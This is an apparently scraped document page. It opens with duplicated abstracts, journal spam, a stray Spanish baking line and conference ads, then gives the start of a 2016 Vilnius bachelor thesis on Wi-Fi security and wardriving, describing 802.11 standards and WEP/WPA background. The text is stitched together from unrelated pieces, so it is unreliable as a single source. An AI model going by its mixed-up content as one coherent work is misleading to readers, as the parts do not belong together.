This document is a thesis on modern wireless security and wardriving in Vilnius, Lithuania. It begins with an introduction to wireless technologies like Wi-Fi and a review of current wireless security measures. It then details attacks that can break various Wi-Fi security standards like WEP, WPA, and WPA2. The document performs wardriving in two districts of Vilnius and analyzes the results. It finds differences in the number of open networks and outdated WEP security between districts. In conclusion, the thesis demonstrates modern wireless vulnerabilities and the prevalence of wireless networks in Vilnius.
Gsm security- a survey and evaluation of the current situationJamal Meselmani
Master’s thesis by Paul Yousef
The Global System for Mobile Communications (GSM) is the most widely used cellular
technology in the world. For GSM, like many other widely used systems, security is crucial.
The aspects of security that this report covers are mainly anonymity, authentication and
confidentiality.
It appears that many of the very valuable aspects of GSM can be attacked. Anonymity,
authentication mechanism and confidentiality can be attacked and compromised if the
attacker possesses the right equipment. In order to break the protection, the attacker needs
to utilise active attacks, i e base station functionality is needed. However, if the attacker is
able to decrypt GSM traffic, i e break A5/1 and A5/2, passive attacks are sufficient.
The cryptographic algorithms used to encrypt GSM traffic and data are cryptographically
weak and can be cryptanalysed in real-time, resulting in compromised confidentiality.
Cryptanalysis of A5 is however nontrivial and often requires huge amounts of computation
power, mainly for the one time pre-computation step.
GSM does not provide sufficient security for users with very valuable information to
communicate. These users are advised to use an additional layer of security on top of GSM
Software based projects are available for computer science, Information science and Information technology students. We have projects on JAVA, DOT NET, PHP, Web Applications, Android, Phyton etc.
More than 3000 project concepts are available for students to choose from. We have projects on Android, Cloud Computing, Networking, Image processing, Data Mining, Secure Computing, Mobile Computing, Ns2 etc.
All the projects are developed based on latest IEEE papers, We develop the projects according to university standards. We also provide synopsis guidance to students, Domain selection guidance, Classes on JAVA, J2EE, J2ME, Tools explanations, Source code explanation, Execution Guidance and provide complete project documentation materials and ppt materials.
We also provide projects for BSc, MSc, BCA,MCA and polytechnic students.
Firewalls have proved to be ineffective for cyber-security. Instead, a new category of security applications has emerged which learn from the criminal behavior of intruders and use data in combination with deception to trap hackers.
Gsm security- a survey and evaluation of the current situationJamal Meselmani
Master’s thesis by Paul Yousef
The Global System for Mobile Communications (GSM) is the most widely used cellular
technology in the world. For GSM, like many other widely used systems, security is crucial.
The aspects of security that this report covers are mainly anonymity, authentication and
confidentiality.
It appears that many of the very valuable aspects of GSM can be attacked. Anonymity,
authentication mechanism and confidentiality can be attacked and compromised if the
attacker possesses the right equipment. In order to break the protection, the attacker needs
to utilise active attacks, i e base station functionality is needed. However, if the attacker is
able to decrypt GSM traffic, i e break A5/1 and A5/2, passive attacks are sufficient.
The cryptographic algorithms used to encrypt GSM traffic and data are cryptographically
weak and can be cryptanalysed in real-time, resulting in compromised confidentiality.
Cryptanalysis of A5 is however nontrivial and often requires huge amounts of computation
power, mainly for the one time pre-computation step.
GSM does not provide sufficient security for users with very valuable information to
communicate. These users are advised to use an additional layer of security on top of GSM
Software based projects are available for computer science, Information science and Information technology students. We have projects on JAVA, DOT NET, PHP, Web Applications, Android, Phyton etc.
More than 3000 project concepts are available for students to choose from. We have projects on Android, Cloud Computing, Networking, Image processing, Data Mining, Secure Computing, Mobile Computing, Ns2 etc.
All the projects are developed based on latest IEEE papers, We develop the projects according to university standards. We also provide synopsis guidance to students, Domain selection guidance, Classes on JAVA, J2EE, J2ME, Tools explanations, Source code explanation, Execution Guidance and provide complete project documentation materials and ppt materials.
We also provide projects for BSc, MSc, BCA,MCA and polytechnic students.
Firewalls have proved to be ineffective for cyber-security. Instead, a new category of security applications has emerged which learn from the criminal behavior of intruders and use data in combination with deception to trap hackers.
Si quieres crear los mejores pasteles de chocolate, tortas de cumpleaños o macarrones dulces, hay algunos utensilios importantes que debes tener y que mejorarán en gran medida el resultado de tus recetas.
Find detailed list of recent & upcoming international conferences, events, seminars, webinars, and workshops in Networking in 2020/2021, only on ICA. We are the biggest conference listing platforms with conference registered across 150+ academic studies in more than 170 countries worldwide. Join our list of 100,000 registered conference subscribers to get free conference alerts in your email for your choice for conferences worldwide.
A Security Framework for Replication Attacks in Wireless Sensor NetworksIJMER
International Journal of Modern Engineering Research (IJMER) is Peer reviewed, online Journal. It serves as an international archival forum of scholarly research related to engineering and science education.
International Journal of Engineering Research and Development (IJERD)IJERD Editor
journal publishing, how to publish research paper, Call For research paper, international journal, publishing a paper, IJERD, journal of science and technology, how to get a research paper published, publishing a paper, publishing of journal, publishing of research paper, reserach and review articles, IJERD Journal, How to publish your research paper, publish research paper, open access engineering journal, Engineering journal, Mathemetics journal, Physics journal, Chemistry journal, Computer Engineering, Computer Science journal, how to submit your paper, peer reviw journal, indexed journal, reserach and review articles, engineering journal, www.ijerd.com, research journals,
yahoo journals, bing journals, International Journal of Engineering Research and Development, google journals, hard copy of journal
Complexity Versus Comprehendability: Simplifying Wireless SecurityOlivia Moran
This paper will follow the use of unsecured wireless networks in the city of Derry. Derry established a city wide open access network in 2008, thereby providing ideal conditions for the study of security issues pertaining to unsecured open access networks.
The paper will attempt to uncover the
reasoning behind the failure of individuals to take suitable security measures in light of threats that exist.
Evaluation of Enhanced Security Solutions in 802.11-Based NetworksIJNSA Journal
Traditionally, 802.11-based networks that relied on wired equivalent protocol (WEP) were especially vulnerable to packet sniffing. Today, wireless networks are more prolific, and the monitoring devices used to find them are mobile and easy to access. Securing wireless networks can be difficult because these networks consist of radio transmitters and receivers, and anybody can listen, capture data and attempt to compromise it. In recent years, a range of technologies and mechanisms have helped makes networking more secure. This paper holistically evaluated various enhanced protocols proposed to solve WEP related authentication, confidentiality and integrity problems. It discovered that strength of each solution depends on how well the encryption, authentication and integrity techniques work. The work suggested using a Defence-in-Depth Strategy and integration of biometric solution in 802.11i. Comprehensive in-depth comparative analysis of each of the security mechanisms is driven by review of related work in WLAN security solutions.
Si quieres crear los mejores pasteles de chocolate, tortas de cumpleaños o macarrones dulces, hay algunos utensilios importantes que debes tener y que mejorarán en gran medida el resultado de tus recetas.
Find detailed list of recent & upcoming international conferences, events, seminars, webinars, and workshops in Networking in 2020/2021, only on ICA. We are the biggest conference listing platforms with conference registered across 150+ academic studies in more than 170 countries worldwide. Join our list of 100,000 registered conference subscribers to get free conference alerts in your email for your choice for conferences worldwide.
A Security Framework for Replication Attacks in Wireless Sensor NetworksIJMER
International Journal of Modern Engineering Research (IJMER) is Peer reviewed, online Journal. It serves as an international archival forum of scholarly research related to engineering and science education.
International Journal of Engineering Research and Development (IJERD)IJERD Editor
journal publishing, how to publish research paper, Call For research paper, international journal, publishing a paper, IJERD, journal of science and technology, how to get a research paper published, publishing a paper, publishing of journal, publishing of research paper, reserach and review articles, IJERD Journal, How to publish your research paper, publish research paper, open access engineering journal, Engineering journal, Mathemetics journal, Physics journal, Chemistry journal, Computer Engineering, Computer Science journal, how to submit your paper, peer reviw journal, indexed journal, reserach and review articles, engineering journal, www.ijerd.com, research journals,
yahoo journals, bing journals, International Journal of Engineering Research and Development, google journals, hard copy of journal
Complexity Versus Comprehendability: Simplifying Wireless SecurityOlivia Moran
This paper will follow the use of unsecured wireless networks in the city of Derry. Derry established a city wide open access network in 2008, thereby providing ideal conditions for the study of security issues pertaining to unsecured open access networks.
The paper will attempt to uncover the
reasoning behind the failure of individuals to take suitable security measures in light of threats that exist.
Evaluation of Enhanced Security Solutions in 802.11-Based NetworksIJNSA Journal
Traditionally, 802.11-based networks that relied on wired equivalent protocol (WEP) were especially vulnerable to packet sniffing. Today, wireless networks are more prolific, and the monitoring devices used to find them are mobile and easy to access. Securing wireless networks can be difficult because these networks consist of radio transmitters and receivers, and anybody can listen, capture data and attempt to compromise it. In recent years, a range of technologies and mechanisms have helped makes networking more secure. This paper holistically evaluated various enhanced protocols proposed to solve WEP related authentication, confidentiality and integrity problems. It discovered that strength of each solution depends on how well the encryption, authentication and integrity techniques work. The work suggested using a Defence-in-Depth Strategy and integration of biometric solution in 802.11i. Comprehensive in-depth comparative analysis of each of the security mechanisms is driven by review of related work in WLAN security solutions.
Evaluation of enhanced security solutions inIJNSA Journal
Traditionally, 802.11-based networks that relied on wired equivalent protocol (WEP) were especially
vulnerable to packet sniffing. Today, wireless networks are more prolific, and the monitoring devices used
to find them are mobile and easy to access. Securing wireless networks can be difficult because these
networks consist of radio transmitters and receivers, and anybody can listen, capture data and attempt to
compromise it. In recent years, a range of technologies and mechanisms have helped makes networking
more secure. This paper holistically evaluated various enhanced protocols proposed to solve WEP related
authentication, confidentiality and integrity problems. It discovered that strength of each solution depends
on how well the encryption, authentication and integrity techniques work. The work suggested using a
Defence-in-Depth Strategy and integration of biometric solution in 802.11i. Comprehensive in-depth
comparative analysis of each of the security mechanisms is driven by review of related work in WLAN
security solutions.
Secure Multi-Constrained QoS Reliable Routing Algorithm for VANETs
FlechaMoreno_Bachelor_Thesis
1. VILNIAUS GEDIMINO TECHNIKOS UNIVERSITETAS
FUNDAMENTINIŲ MOKSLŲ FAKULTETAS
INFORMACINIŲ TECHNOLOGIJŲ KATEDRA
Alejandro Flecha Moreno
Modern Wireless Security Analysis and Wardriving of the city of
Vilnius
Saugumo užtikrinimas šiuolaikiniuose beviliuose tinkluose ir
neapsaugotų prieigos vietų paieška Vilniaus mieste bei priežasčių
analizė
Vilnius, 2016
2. VILNIAUS GEDIMINO TECHNIKOS UNIVERSITETAS
FUNDAMENTINIŲ MOKSLŲ FAKULTETAS
INFORMACINIŲ TECHNOLOGIJŲ KATEDRA
Alejandro Flecha Moreno
Modern Wireless Security Analysis and Wardriving of the city of
Vilnius
Saugumo užtikrinimas šiuolaikiniuose beviliuose tinkluose ir
neapsaugotų prieigos vietų paieška Vilniaus mieste bei priežasčių
analizė
Vadovas Dr. Nikolaj Groanin
Vilnius, 2016
3. DEDICATION
This thesis work is dedicated to my family that thanks to its dedication, commitment,
effort and unconditional support, made possible the development of this work.
To my fellow students with whom I shared knowledge and experiences that forged a great
bond of friendship.
4. INDEX
GRATITUDES ............................................................................................................................ 6
SUMMARY ................................................................................................................................. 7
1. INTRODUCTION................................................................................................................... 8
1.1 OBJECTIVES ................................................................................................................... 9
1.1.1 General........................................................................................................................ 9
1.1.2 Specific ........................................................................................................................ 9
1.2 PRACTICAL VALUE...................................................................................................... 9
2. REVIEW OF WIRELESS TECHNOLOGIES .................................................................. 10
2.1 WI-FI TECHNOLOGY. BRIEF INTRODUCTION................................................... 12
2.2 RADIO FREQUENCY AND SIGNAL ......................................................................... 17
2.3 NETWORK INFRASTRUCTURE AND TOPOLOGIES.......................................... 17
2.4 ACTUAL SECURITY MEASURES IN Wi-Fi............................................................. 19
2.4.1 INTRODUCTION.................................................................................................... 19
2.4.2 OPEN TYPE NETWORKS..................................................................................... 20
2.4.3 WEP SECURITY..................................................................................................... 20
2.4.4 WPA SECURITY..................................................................................................... 20
2.4.5 WPA2 SECURITY................................................................................................... 22
2.5 ANALYSIS OF HOW TO BREAK CURRENT WIFI SECURITY.......................... 25
2.5.1 INTRODUCTION.................................................................................................... 25
2.5.2 ATTACKS ON OPEN NETWORKS..................................................................... 25
2.5.3 ATTACKS ON WEP TECHNOLOGY ................................................................. 28
2.5.4 ATTACKS ON WPA AND WPA2 TECHNOLOGY ........................................... 33
2.5.5 CONCLUSION ON WI-FI WEAKNESS POINTS............................................... 35
2.6 INTRODUCTION TO WARDRIVING........................................................................ 36
3. ATTACKS ON WI-FI WEAKNESS POINTS ................................................................... 40
3.1 INTRODUCTION........................................................................................................... 40
3.2 ATTACK ON WEP TECHNOLOGY........................................................................... 40
3.3 ATTACK ON WPA & WPA2 TECHNOLOGY THROUGH WPS .......................... 49
3.4 CONCLUSION ON PRACTICAL WI-FI ATTACKS................................................ 52
4. WARDRIVING IN THE CITY OF VILNIUS ................................................................... 53
4.1 TECHNOLOGY USED.................................................................................................. 53
4.2 PRACTICAL WARDRIVING....................................................................................... 62
4.2.1 WARDRIVING IN THE DISTRICT OF ŠNIPIŠKĖS......................................... 62
4.2.2 WARDRIVING IN THE DISTRICT OF ŠEŠKINĖ ............................................ 65
5. 4.2.3 COMPARISON OF BOTH WARDRIVING......................................................... 69
4.2.4 CONCLUSION ON THE COMPARISON............................................................ 72
5. FINAL CONCLUSION ........................................................................................................ 75
6. BIBLIOGRAPHY ................................................................................................................. 76
7. ANNEX................................................................................................................................... 77
8. ANNEX OF IMAGES........................................................................................................... 77
6. 6
GRATITUDES
To the University of León, that educated me as a professional.
To Vilniaus Gedimino Technikos Universitetas, that allowed me to feel the experience of
living and studying abroad.
To Dr. Javier Alfonso Cendón, whose help and support made possible to elaborate this
thesis work from Lithuania and to get through all the paper work that was required.
To Dr. Nikolaj Goranin, whose support, recommendations and guide during the
development of this thesis work were a great contribution and important to reach these
instances.
To Dr. Chema Alonso, whose recommendation of the book „Hacking práctico de Redes
Wi-Fi y radiofrecuencia“(Practical hacking of Wi-Fi networks and radio frequency in
English) was of great help for the development of the theorical part of this work.
7. 7
SUMMARY
In this thesis work the different Wi-Fi networks security types that can be found nowadays
have been studied. The different ways to break those security measures have been also
studied and, with the realization of a Wardriving, it has been proved how much this
wireless technology belongs to our daily life.
This thesis work starts with an analysis of actual security measures we can find at Wi-Fi
networks around the world. To do this a book recommended by Dr. Chema Alonso is
used, among others.
The theoretical analysis is not only the study of the different types of Wi-Fi security but
also the study of different ways or attacks to break those security measures. The book
mentioned above and a lot of different websites and books were used.
Once all the information about the strengths and weaknesses is known, an attack on WEP
technology and on WPA2 have been done in order to prove how easy is to do nowadays.
The practical part of this thesis work also consists in the realization of a Wardriving.
The Wardriving was done to have an evidence of how much this technology has been
implemented in a modern city as Vilnius.
With this Wardriving some interesting facts have come to the light. With the study of
those facts, different aspect of Vilnius and wireless networks were able to be studied, such
as the differences between two districts of Vilnius, the number of OPEN networks and
the number of networks that still have WEP technology as its security algorithm.
8. 8
1. INTRODUCTION
Wireless technology security and our dependence on it is on everyone’s lips at the time
of writing. Movies and television programs nowadays demonstrate how easy it is to
access our data unlawfully. TV series such as the recently awarded "Mr. Robot "and / or
actions of hackers known worldwide such as Dr. Chema Alonso on national television
only proof this point. Those actions do nothing but highlight the weakness of a type of
technology that is already part of our lives.
But despite all this information, which continues to remind us how fragile our privacy
and security in the digital world is, the vast majority of people keep connecting to the
Internet, daily, through free access points, hotspots. These hotspots, which can be easily
found in restaurants, bars or airports, have no security, so anyone with the proper
knowledge could get access to our traffic at will, as the proper Chema Alonso took care
to show in prime time.
But this thesis work is not only about the security, or the lack of it, in OPEN networks.
Security systems used today also have vulnerabilities. In this thesis work the strengths
and weaknesses of the most common Wi-Fi security type, from WEP to WPA2, will be
studied. This work will include a theoretical and a practical study.
Lithuania was recognized as the country that offers the best free Wi-Fi service, being
superior to richer countries like Singapore or the United Kingdom. These tests were
conducted in nearly 200 countries, with Lithuania as the clear winner. [1]
With the realization of a Wardriving in Vilnius I hope to get an idea of the impact of Wi-
Fi technology in a city of just 300,000 inhabitants and to see how many OPEN Wi-Fi
networks can be detected on a normal day.
To carry out this thesis work various sources were used. The bibliography will be
extensive and varied, since this topic, as I have mentioned above, it is now rigorously.
The sources that are going to be used in this thesis work will be easily found, the vast
majority of them, on the Internet, although a book, recommendation of Dr. Chema
Alonso, has been also used.
9. 9
1.1 OBJECTIVES
1.1.1 General
Studying the strengths and weaknesses of the current Wi-Fi technology and performing a
Wardriving in the city of Vilnius.
1.1.2 Specific
1. - Studying the strengths and weaknesses of WEP, WPA and WPA2.
2. - Attempt to break WEP security and analysis of the process.
3. - Realization of a Wardriving in different districts of the city of Vilnius.
4. – Perform a statistical analysis of the information collected
1.2 PRACTICAL VALUE
There are various practical values for this thesis work. On one hand, from a scientific
point of view, the realization of a Wardriving is very interesting since it allows us to
understand and to imagine the spread of the wireless technology at the time of writing. A
Wardriving in a modern city like Vilnius could give us a lot of information, like for
example, the ratio of inhabitants and wireless networks or different percentages.
On the other hand, the fulfillment of the breakup of WEP and WPA2 technologies, when
previously it has been explained the weakness points and different attacks on the different
encryption systems, has plenty practical values. The proof of how easy are those
technologies to break, even without a big knowledge on this topic make us realize how
vulnerable this technology is. This thesis work aims to show how important is to keep our
encryption system up to date and how the user must take care of his own privacy while
using OPEN Networks at restaurants or at the airport.
This thesis work has been the first approach of the student in charge of writing this study
and with its conclusion, the student knows how to break WEP and WPS.
“Measurement is the first step that leads to control and eventually to improvement. If you
can’t measure something, you can’t understand it. If you can’t understand it, you can’t
control it. If you can’t control it, you can’t improve it.” H. James Harrington.
10. 10
2. REVIEW OF WIRELESS TECHNOLOGIES
Wireless communication technologies have reached a huge peak in the last years,
something that could be predicted (and, in fact, it was) long time ago. A technology that
was thought to replace, in some scenarios, the wired networks, has grown exponentially
in the last years, thanks to the use of laptops, smartphones, tablets, etc.
This has been possible thanks to, not only the hardware nowadays has Wi-Fi technology
as its main point of access to the Internet, but also the need of being always online and
connected (a lot of programs and applications nowadays require being online in order to
work) also made its appearance. Users all around the world, from all age rounds and social
classes, use wireless networks in order to get access to the Internet as their usual choice.
A huge majority of them only use wireless technologies.
There is also another booming figure that uses Wi-Fi in the professional scope: tablets
and/or pads. Today you can find tablets in almost every restaurant, shop, airport, hospital,
etc. that are used in order to get access, not just to the internet, but to the intranet to change
data, quickly, from the workstation.
During the early years of this devices (smartphones, tablets and so), the access to the
internet was given by the data networks owned by the mobile operators (Vodafone,
Telefonica…)
Nevertheless, the use, the bandwidth and the data flow needed in order to provide access
to all the user that are requesting those services, are making that the data networks based
on GPRS, EDGE, 3G, HSPA and 4G are having problems, like overflow and making their
maintenance and update more and more difficult.
That’s why, the access to the internet is based, more and more every day, in domestic,
private (restaurant, bar, shop…), corporative and/or public (station, airport…) Wi-Fi
wireless networks.
During those years of increase, creating a proper level of security was a tedious, boring
task and, in some cases, there was no security at all. The need of protect the personal and
corporative data was eliminated during the first years of implementation of those
technologies, creating therefore insecure networks that did not allow any kind of security
or made security so difficult to be implemented.
On the other hand, the communication protocols used on the superior levels of OSI
technology forced to use data without any kind of encode. Such protocols like POP3,
SMTP, SNMP and FTP can still be “captured” with a sniffer and we are still able to see
its information as plain text, with all the passwords and information.
The awareness about the needed of security in communications began a few years ago,
and it is something that has been increasing inside our mentality, and more important,
inside networks administrators and protocols and applications designers. But, even
nowadays, the consequences of that lack of security in the early Internet are suffered by
those who try to implement some security functions. For example, the lack of security is
present in the connections made in public sites or in networks with a bad implementation
of security. An example can be found in the interview given by Dr. Chema Alonso to the
Spanish TV program “Salvados” [2], where he was able to obtain, by just using a free-
program, the password and the e-mail of a victim.
11. 11
In fact, we should remind the OSI model:
Picture 1: OSI Model
As we can see in the image above, the OSI model has seven different layers. The questions
should be: in which of those layers we must apply the security measures? Which one is
responsible? And if we ask to ourselves this questions, we will find out that there is not
one single answer, but many. There is not just one layer responsible of the security, but
all of them must have some security measures.
Security is necessary in all of them because nowadays, we are used to open – public
Wi-Fi networks. One big issue with those public Wi-Fi networks, is that in those networks
we lose the lower layers of the OSI model, and the only layer we have left is the layer
number seven (Application layer), so the last layer must contain some security measure,
so in case the traffic is intercepted, since the traffic is encoded, it would be impossible to
read. An example would be two of the most popular applications nowadays: WhatsApp
and Skype.
In this thesis work, the Wi-Fi technology and the different security measures that can be
found today will be explained and, also, the different ways to break (or try to break) into
the previous explained Wi-Fi technology.
A study of the city of Vilnius, by the realization of a Wardriving, will be also carried out.
The goal of the Wardriving is to analyze, once all the different security measures have
been studied, how easy would be in a real environment to get access to private data.
12. 12
2.1 WI-FI TECHNOLOGY. BRIEF INTRODUCTION
In order to understand this thesis work, the first that must be done, is to understand Wi-
Fi technology. Therefore, an explanation, as briefly as possible, the evolution of the
wireless technology known as Wi-Fi and the standards that are regulating it, is going to
be carried out.
Those standards that nowadays seem like something normal, or not special, have been
one of the most important pillars in the development of the protocols of communications
Wi-Fi is based on.
But before Wi-Fi networks, there were another designs of wireless networks, but not as
good as Wi-Fi, since they were technologies property of various manufacturers. The main
problem was that those systems did not communicate with other systems of different
manufacturers. This was a huge problem, since it made very difficult to commercialize
them.
To solve this problem, and to reach that all the manufacturers foment that technology in
the same way, it was decided to unify some of those technologies and to develop groups
of work within IEEE (Institute of Electrical and Electronics Engineers). IEEE is an
international society integrated by engineers that promote the development of open
technologies as standards.
IEEE already had groups of works, working on 802.x, dedicated to the data
communication networks like Ethernet (802.3).
In 1992, another society called ETSI (European Telecommunications Standards Institute)
was developing another standard called Hiperlan (High Performance Radio LAN) for
high-speed wireless networks. But it did not succeed, since IEEE offered more
commercial guarantees.
If we take a look into the table above, we would be able to see that the work group 802.11
is the one dedicated to WLAN (Wireless Local Area Networks) wireless networks.
Something important are the differences between Wi-Fi, WLAN and 802.11. Wi-Fi is a
trademark registered by Wi-Fi Alliance to allow the certification of products that
accomplish the 802.11 standards, published by IEEE. WLAN alludes just to local wireless
networks.
This group was created in the 90s, and it defines how the wireless networks (or WLAN),
that act within the two lower layers of the OSI model, will work. Those layers are the
physical layer (number one) and the data link layer (number two). Protocols like TCP or
IP, among others, will be the responsible of the remaining layers.
Next, the different IEEE work groups and the different standards related to Wi-Fi will be
listed:
1. 802.11 legacy.
2. 802.11b.
3. 802.11a.
4. 802.11c.
5. 802.11d.
6. 802.11e.
13. 13
7. 802.11F.
8. 802.11g.
9. 802.11h.
10. 802.11i.
11. 802.11Ir.
12. 802.11j.
13. 802.11k.
14. 802.11n.
15. 802.11p.
16. 802.11r.
17. 802.11u.
18. 802.11v.
19. 802.11w.
20. 802.11ac.
21. 802.11af.
22. 802.11ad.
23. 802.11ah.
From those, the most important ones for this work are 802.11g, 802.11i and 802.11n and
one of the most recent groups, 802.11ac, approved in 2014.
802.11g: 802.11g, also known as 802.11g-2003. It was approved in 2003 and incorporated
the technology that had been introduced with 802.11a with a theoretical bandwidth of
54Mb/s, up to 30Mb/s in the real life, to the band ISM of 2,4GHz. It also incorporated,
but this was optional, a legacy mode compatible with 802.11b, so the access points that
were certificated with 802.11g can interact with stations compatible with the previous
802.11b.
A non-standard specification, called 802.11g+, could offer speeds up to 108Mb/s, but just
by using proprietary protocols of some manufacturers. It uses OFDM and DSSS
modulation for 802.11b compatibility.
The way 802.11g+ works will not be entirely explained here, the whole process, but the
main topic is that 802.11g+, at least the one at Texas Instruments [3], uses schemes such
as frame concatenation and packet bursting.
14. 14
Picture 2: example of how frame concatenation works.
802.11i: 802.11i is a standard for wireless local area networks, WLANs, that provides
improved encryption for networks that use the popular 802.11a, 802.11b and 802.11g
standards. This standard requires new encryption key protocols, known as Temporal Key
Integrity Protocol, or TKIP, and Advanced Encryption Standard, AES. The 802.11i
standard was officially ratified by IEEE in June, 2004. It became part of the 802.11 family
of wireless network specifications.
The 802.11i specification offers a level of security enough to satisfy most government
agencies. However, AES requires a dedicated chip. It might mean hardware upgrades for
most existing Wi-Fi networks.
Other features of 802.11i are key caching, which facilitates fast reconnection to the server
for users who have temporarily gone offline, and pre-authentication, which allows fast
roaming and is ideal for use with advanced applications such as Voice over Internet
Protocol (VOIP).
Its implementation is known as WPA2. It was used a lot, even before its final ratification,
using some of its technology as WPA.
802.11n: the 802.11n working group was set up in 2004 and was confirmed in 2009. The
point of 802.11n was to improve significantly the network performance beyond the
previous standards (802.11b and 802.11g mostly) with an increase of the network speed,
from a maximum speed of transmission of 54Mbps to a top of 600Mbps. Nowadays, the
physical layer can handle speeds up to 300Mbps (that is ten times higher than in the
previous standards).
Picture 3: 802.11n and 802.11g example
15. 15
To reach this, it implements the MIMO technology (Multiple Input – Multiple Output).
A briefly explanation of how MIMO technology works is to follow:
Picture 4: example of MIMO technology
As it can be seen in the picture above, MIMO technology allows the use of multiple
antennas, radios and channels at the same time. A feature of MIMO is known Three -
Stream, which uses three spatial streams to dramatically increase the wireless speed. The
channel width is also very important. It is usually 20MHz, but 802.11n allows 40MHz
channel width by using two (although contiguous) separate channels to achieve greater
speed.
Like 802.11i, this standard was long time waited and it was widely implemented before
its ratification.
802.11n is not just focused in the use of just one band. It allows the use of the 2,4GHz
and 5GHz bands. 802.11n also keeps the legacy mode, so it is compatible with the
previous standards. It also incorporates a standard mode without this legacy mode.
But not everything is perfect with 802.11n. Since it uses the 40 MHz bandwidth, problems
of interferences may come out. Because of this, the setup of several access points is
complicated.
Nowadays, several equipment can offer, theoretically, 600Mbps of bandwidth, although
its real bandwidth goes up until 100 Mbps.
802.11ac: 802.11ac, also known as Wi-Fi 5G and/or Wi-Fi Gigabyte, was approved in
January 2014. It was thought to be the substitute of 802.11n. It is also designed on MIMO,
but the bandwidth was amplified to 80MHz, reaching 160MHz in the adjacent band. Its
goal is to reach a bandwidth of 1Gb/s by using only and exclusively the 5GHz band.
802.11ac is, like past Wi-Fi standards, backwards compatible with 802.11b, g and n.
The difference between 802.11ac and 802.11n is that the speed will be significantly better
in 802.11ac and as it can be seen in the image below, 802.11ac is faster than 802.11n
16. 16
Picture 5: comparative of speed between 802.11n and 802.11ac
1.3Gbps is the speed most commonly cited as the 802.11ac standard. This translates to
166 MBps or 1331Mbps. It is vastly quicker than the 450Mbit per second (0.45Gbps)
headline speeds quoted on the highest performing 802.11n routers.
But it must remembered that those are theoretical speeds, not real speeds. After a lot of
test that are accessible on the Internet, 802.11n performance tends to top off around 50-
150Mbit. Meanwhile, the reviews of draft 802.11ac routers have typically found
performance to be closer to 250-300Mbit. This means that 802.11ac is, more or less, 2’5
times faster than 802.11n.
The range of 802.11ac is also important, since 5 GHz (802.11ac) signals do not broadcast
as far as 2.4GHz (802.11n) signals do, but the band of 5GHz is less used, meaning much
less interference from neighboring Wi-Fi networks.
But 802.11ac also does beamforming.
Beamforming technology
Rather than throwing out wireless signal equally in all directions, Wi-Fi with
beamforming technology detects where the devices are and intensifies the signal in their
direction(s), as it can be seen in the image below:
Picture 6: example of how beamforming works in 802.11ac
17. 17
2.2 RADIO FREQUENCY AND SIGNAL
Another important topic about wireless networks and/or communication is the radio
electric spectrum, how it is classified in bands and its characteristics. This is important to
understand the wireless networks.
The radio electric spectrum is a fraction of the electromagnetic spectrum. There are
different electromagnetic waves: naturals (like the solar radiation) or artificial (like the
waves used in mobile phones). The radio electric spectrum include just the waves used
for communications (radio, telephone, Internet, etc.).
That waves are known as radio frequency waves. The radio electric spectrum can be found
between the frequencies 10 KHz and 3.000 GHz.
Picture 7: Band distribution in the radio electric spectrum.
The spectrum is regulated by bands, which go from an initial frequency until a final one.
Inside those bands a certain number of channels can be found, so its frequency can be
referred in an easier and more efficient way. For example, the Wi-Fi technology is
included within the UHF and SHF bands.
2.3 NETWORK INFRASTRUCTURE AND TOPOLOGIES.
AVAILABLE INFRASTRUCTURES
A. Access point
B. Distribution System
C. Station
Access point: Network equipment that is able to work above the radio frequency network,
used as intermediary in wireless communications between equipment and to transform a
wired network into a wireless one. The access point can be visible since it has a network
name called SSID (Service Set IDentifier). This name is spread by the access point thanks
to some packages sent by the access point (the access point sends 250 packages per
minute). Those packages include information about the network. The beacon are used to
locate the network and to know how strength the network is. Nowadays, the SSID can be
avoided to be broadcast in the access point configuration, so the SSID of our access point
will not be spread; however, this does not offer a higher level of security. The SSID can
be detected when any station connects to the access point.
18. 18
Picture 8: example of an access point
Distribution system: The distribution system (DS) allows the exchange of data between
different access points that cooperate forming an infrastructure. The DS allows, among
other functions, the exchange of one station session between different access points while
roaming. The DS can also be wireless (WDS), allowing us to create infrastructures of
several access points working in a collaborative way, but not united by a network wire.
Picture 9: example of a DS
Station: The client computer / equipment that connects to an access point to use its
network services is a station. An access point can play the role of a station of another
access point creating another kind of infrastructure. The station decides, automatically by
protocol, to connect to the access point that better fulfill its requisites and that offers a
better level of signal (strength), being able to do roaming between those with the same
SSID. All those stations have the hardware (WNIC: Wireless Network Interface
Controller) and software (drivers and firmware) necessary to connect to a network and to
accomplish with the requirements.
Also, Wi-Fi networks define several models of structure, depending of its design and
topology:
1. BSS or Basic Service Set.
2. ESS or Extended Service Set.
3. IBSS or Independent Basic Service Set.
19. 19
It is possible to find:
1. Bridge mode.
2. Repeater mode.
3. WDS mode (Wireless Distribution System).
4. Client mode or STA
2.4 ACTUAL SECURITY MEASURES IN Wi-Fi
2.4.1 INTRODUCTION
Nowadays, different types of security in Wi-Fi networks can be found. Since its first
appearance, the security protocols that govern such networks have changed. And a lot.
Today the WPA and WPA2 security protocols provide us a level of security like we had
never enjoyed before, but multiple vulnerabilities have been already discovered, being
some of them really interesting.
Below, the various protocols and / or Wi-Fi networks that can be found nowadays:
1. OPEN type networks or open
2. Network with WEP security type
3. Networks with WPA security type
4. Networks with WPA2 type security
Brief history
The first wireless networks lacked of any measure of security and/or data encryption. The
reason was simple: there was no need for it or it was not seen as something to consider.
With the popularization of this technology, users and system administrators began to
require a minimum of security. Sales fell and the industry got down to work. There are a
lot of differences between wired and wireless networks, but the main one is, as the name
suggests, physical access to the network. To access a wired network, physical access to
the network is required. Meanwhile, to access to a wireless network compatible
equipment and being at a suitable distance are required. Thanks to this emerging demand
the Wired Equivalent Privacy, or WEP technology for its acronym in English, appeared.
With its implementation, the consumer confidence was restored, even though WEP was
targeted soon by hackers and before long, this new technology was "broken".
Nowadays, wireless networks security lays down on WPA and on its newest version,
WPA2.
Even though WPA and WPA2 are not perfect, and some vulnerabilities has been recently
discovered, WPA2 is the best option while protecting our wireless network from attacks
from third parties.
20. 20
2.4.2 OPEN TYPE NETWORKS
As its name indicate, OPEN networks have no security. At all. These networks, that can
be easily found at restaurants, airports and, at the time of writing this work, more and
more cities around the world are installing this kind of networks at their squares and
streets, are thought to be an easy, fast and most of the times free way to get access to the
Internet.
2.4.3 WEP SECURITY
WEP was the first security protocol widely deployed by the industry. This protocol
includes a validation system between the station and the access point and continuous data
encryption based on the RC4 symmetric algorithm. This encryption engine, along with
other functions such as CRC32 and generating a small initialization vector IV is
incorporated into the wireless chipset adapters.
In less than a year, WEP was exploited and its vulnerabilities were public domain.
2.4.4 WPA SECURITY
Once discovered the shortcomings of WEP, the industry turned to demand a reliable,
